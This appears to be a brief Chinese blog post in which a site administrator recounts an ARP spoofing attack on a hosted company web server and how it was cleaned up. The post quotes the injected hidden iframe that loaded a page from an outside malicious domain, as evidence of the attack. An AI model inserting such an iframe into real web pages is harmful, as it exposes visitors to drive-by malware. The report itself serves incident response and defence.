1. 攻击现象
5月16日 19:00左右,在下班回家的路上得到消息,公司的网站访问异常,异常情况如下
a) IE7打开所有的网站html页面都变成了文件下载,无法正常打开网站
b) IE7改用不使用http1.1后,可以打开网站,但发现源文件头部被嵌入了1个iframe
Iframe内容为:<iframe src=http://xindizhi88.com/10.htm width=20 height=0 frameborder=0></iframe>
Google 百度过后发现是服务器收到了arp攻击
http://www.google.cn/search?sourceid=navclient&hl=zh-CN&ie=UTF-8&rlz=1T4GGLJ_zh-CNCN248CN249&q=%22xindizhi88%2ecom%22
http://www.baidu.com/s?wd=%22xindizhi88%2ecom%22&cl=3
2. 攻击解决办法
a) 装arp防火墙软件
我这里是用了360安全卫士和360arp防火墙。效果还不错,访问正常了。此时已经19:50.整整花了50分钟。也顺利找到了arp攻击源。
b) 找到arp攻击源杀掉
由于是服务器托管,就把我这边发现的情况发给托管机房的技术人员。21:00左右接到机房通知arp攻击源已经处理。上服务器发现确实正常了。
3. 参考资料
a) 一行代码暂时解决iframe挂马: http://www.foloda.com.cn/BLOG/article.asp?id=70
4. 被arp攻击后的反思
a) 一般的服务器上到底是需要装什么样的安全软件?
i. 杀毒软件
ii. 防ddos攻击软件
iii. 防arp攻击软件
iv. 还有…
大家多提提意见。